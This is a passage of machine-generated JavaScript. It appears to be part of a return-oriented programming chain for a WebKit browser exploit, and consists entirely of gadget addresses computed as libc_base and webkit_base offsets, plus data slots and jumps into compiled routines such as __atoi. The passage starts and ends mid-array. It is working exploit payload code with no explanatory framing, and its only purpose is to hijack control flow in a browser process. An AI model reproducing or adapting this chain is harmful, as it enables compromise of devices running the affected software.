libc_base+764760, //pop rsi ropchain+341472, //L6889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6889: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6891: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L6893: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+341632, //L6896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+341616, //L6894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6894: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6896: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+341776, //L6899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+341744, //L6897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+341760, //L6898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6897: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6898: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6899: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+341864, //L6901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6900: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L6901: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi 
ropchain+341920, //L6902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6902: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6904: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+342000, //L6906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6906: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+342096, //L6908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6907: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6908: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6909: db([1, 0]); // 0x1 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+342176, //L6910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6910: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6912: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+342256, //L6913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6913: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+344232, //L6768 //L6720: libc_base+764760, //pop rsi ropchain+342320, //L6915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6915: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6917: 
db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+342440, //L6920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+342424, //L6918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6918: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6920: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+342616, //L6923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+342632, //L6924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+342584, //L6921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+342600, //L6922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6921: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6922: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6923: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6924: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+342728, //L6926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+342712, //L6925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6925: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6926: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6927: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 
0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6928: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L6929: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+342928, //L6931 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6931: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+342984, //L6932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6932: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+343120, //L6936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+343104, //L6935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6934: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6935: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6936: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+343184, //L6937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6937: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6939: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop 
rsi ]); //L6941: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+343344, //L6944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+343328, //L6942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6942: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6944: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+343488, //L6947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+343456, //L6945 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+343472, //L6946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6945: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6946: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6947: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+343576, //L6949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6948: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L6949: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+343632, //L6950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6950: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6952: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+343712, //L6954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6954: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+343808, //L6956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6955: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6956: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6957: db([1, 0]); // 0x1 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+343888, //L6958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6958: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6960: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+343968, //L6961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6961: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+344232, //L6768 //L6721: libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+344048, //L6964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6963: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6964: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6965: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+344128, //L6966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6966: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6968: db([4294967280, 
4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+344208, //L6969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6969: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+344232, //L6768 //L6768: libc_base+764760, //pop rsi ropchain+344272, //L6971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6971: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6973: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+344392, //L6976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+344376, //L6974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6974: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6976: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+344568, //L6979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+344584, //L6980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+344536, //L6977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+344552, //L6978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6977: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6978: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6979: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6980: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi 
libc_base+764760, //pop rsi ropchain+344744, //L6984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+344712, //L6982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+344728, //L6983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6981: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6982: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6983: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6984: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+344880, //L6987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+344912, //L6989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+344864, //L6986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6986: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6987: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6988: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6989: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+345024, //L6990+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+345016, //L6990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6990: db([0, 0]); // 0x0 set_gadgets([ ropchain+345040, //L6990+24 ropchain+345056, //L6985 libc_base+782311, //pop rsp ropchain+327440, //L6528 //L6985: //L6991: libc_base+853989, //mov rax, rcx 
libc_base+764760, //pop rsi ropchain+345112, //L6993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6992: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6993: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6994: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+345192, //L6995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6995: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6997: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L6999: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+345352, //L7002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+345336, //L7000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7000: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7002: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+345432, //L7003 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+345448, //L7004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7003: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7004: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+345608, //L7008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+345576, //L7006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+345592, //L7007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7005: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7006: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7007: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7008: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+345664, //L7010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7010: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+345792, //L7012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+345808, //L7013 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+345776, //L7011 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7011: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7012: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7013: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+345968, //L7017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+345936, //L7015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+345952, //L7016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7014: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7015: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7016: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7017: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, 
//shl rax, cl libc_base+764760, //pop rsi ropchain+346024, //L7019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7019: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+346152, //L7021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+346168, //L7022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+346136, //L7020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7020: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7021: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7022: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+346328, //L7026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+346296, //L7024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+346312, //L7025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7023: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7024: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7025: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7026: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+346384, //L7028 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7028: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+346512, //L7030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+346528, //L7031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+346496, //L7029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7029: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7030: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7031: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+346608, //L7032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+346624, //L7033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7032: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7033: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+346720, //L7035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+346704, //L7034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7034: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7035: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L7037: ropchain+346824, //L7036 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+180736, //__is_digit //L7036: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+346952, //L7040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+764760, //pop rsi ropchain+346936, //L7039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7038: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7039: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7040: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+347008, //L7042 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7042: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+347136, //L7044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+347152, //L7045 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+347120, //L7043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7043: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7044: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7045: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+347264, //L7047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+347312, //L7050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+347280, //L7048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7047: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7048: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7049: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7050: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 
libc_base+764760, //pop rsi ropchain+347424, //L7051+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+347416, //L7051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7051: db([0, 0]); // 0x0 set_gadgets([ ropchain+347440, //L7051+24 ropchain+347904, //L7046 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+347496, //L7053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L7052: db([40, 0]); // 0x28 set_gadget(libc_base+759608,); //pop rax //L7053: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L7055: ropchain+347608, //L7054 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+185320, //__atoi //L7054: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, 